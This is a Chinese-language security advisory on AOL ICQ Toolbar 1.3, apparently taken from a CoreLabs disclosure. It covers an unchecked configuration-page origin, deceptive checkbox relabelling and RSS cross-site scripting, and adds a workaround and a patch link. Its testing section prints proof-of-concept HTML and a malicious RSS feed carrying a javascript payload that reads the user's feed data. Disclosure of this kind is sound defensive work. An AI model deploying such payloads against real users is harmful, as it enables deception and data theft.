AOL ICQ Toolbar 1.3 for Internet Explorer

描述：

ICQ Toolbar是一个可安装于IE的工具栏，通过HTML页面提供基于web的配置界面。

ICQ Toolbar没有验证所加载Web页面的位置或来源，因此可以从本地系统或在线配置工具栏。这允许攻击者轻易的拷贝本地保存的options2.html文件的内容并做为html文件上传到任意站点。

每个复选框控件关联到配置设置的方法仅仅是将每个HTML复选框标签的ID属性匹配到期望配置ID的列表。这允许攻击者更改复选框控件的外部表现以掩饰攻击。只要ID属性匹配了相关的配置设置，攻击者就可以向用户浏览器中呈现任意HTML。上述两个漏洞都允许攻击者读取并更改ICQ工具栏配置。

标准RSS feed XML文档中item元素的标题和描述字段存在跨站脚本漏洞。应用程序没有执行任何过滤或编码便直接将上述两个字段的内容附加到了HTML输出，这允许攻击者注入Javascript代码并在用户浏览器中执行。

<*来源：CoreLabs （http://www.coresecurity.com/corelabs/）
  
  链接：http://marc.theaimsgroup.com/?l=bugtraq&m=115766560817318&w=2
*>

测试方法：

以下两个复选框可以伪装成官方配置界面（options2.html）对ICQ Toolbar执行自动升级：

< input type="checkbox" id="UpdateAutomatically">< font face="Tahoma" size="2">Update ICQ Toolbar automatically< /font>

< input type="checkbox" id="UpdateAutomatically">< font face="Tahoma" size="2">I’m 21 years old or older.< /font>

以下XML文档描述了恶意RSS feed漏洞：

< ?xml version="1.0" encoding="iso-8859-1" ?>
< rss version="2.0">
< channel>
< title>Sample evil feed< /title>
< link>http://evilfeed< /link>
< description>This is a sample evil RSS feed!< /description>
< language>en-us< /language>
< item>
< title>Stealing your RSS feeds!< /title>
< link>http://localhost< /link>

< description>&lt;img src="javascript:var url=parent.left.external.GetDataFile();var%20a=parent.left.load_xml(url);var b=parent.left.parse_tree_data(a, 0, url,'');alert(b)"&gt;< /description>

< pubDate>2006-07-20< /pubDate>
< /item>
< /channel>
< /rss>

建议：

临时解决方法：

* 在Internet Explorer中删除或禁用工具栏。请注意通过“查看->工具栏”清除ICQ工具栏无法禁用，只是将这个工具栏隐藏。

厂商补丁：

AOL
---
目前厂商已经发布了升级补丁以修复这个安全问题，请到厂商的主页下载：

http://download.icq.com/download/toolbar/